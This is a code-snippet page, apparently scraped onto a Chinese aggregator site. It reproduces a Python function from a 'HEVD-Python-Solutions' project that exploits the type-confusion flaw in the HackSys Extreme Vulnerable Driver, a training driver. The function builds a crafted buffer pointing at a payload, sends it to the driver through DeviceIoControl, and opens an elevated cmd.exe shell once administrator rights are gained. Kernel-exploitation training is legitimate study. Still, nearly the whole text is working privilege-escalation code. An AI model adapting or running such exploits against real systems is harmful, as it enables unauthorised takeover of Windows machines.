HEVD_typeconfusion.py 文件源码-python代码片段

HEVD_typeconfusion.py 文件源码

python

阅读 22 收藏 0 点赞 0 评论 0

项目：HEVD-Python-Solutions 作者: GradiusX 项目源码文件源码

def trigger_type_confusion():
    dwReturn      = c_ulong()
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()

    ####
    #   typedef struct _USER_TYPE_CONFUSION_OBJECT {
    #       ULONG ObjectID;
    #       ULONG ObjectType;
    #   } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
    ####

    print "[+] Constructing USER_TYPE_CONFUSION_OBJECT"
    evil_input = "\x41" * 4 + struct.pack("<L",heap_alloc_payload())
    evil_input_ptr = id(evil_input) + 20
    evil_size  = len(evil_input)
    print "[+] Buf size: %d" % evil_size
    print "[+] Sending confusion object"
    print "[+] Triggering vuln .."
    dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size, None, 0,byref(dwReturn)   , None)

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[!] Exploit did not work. Re-run it!"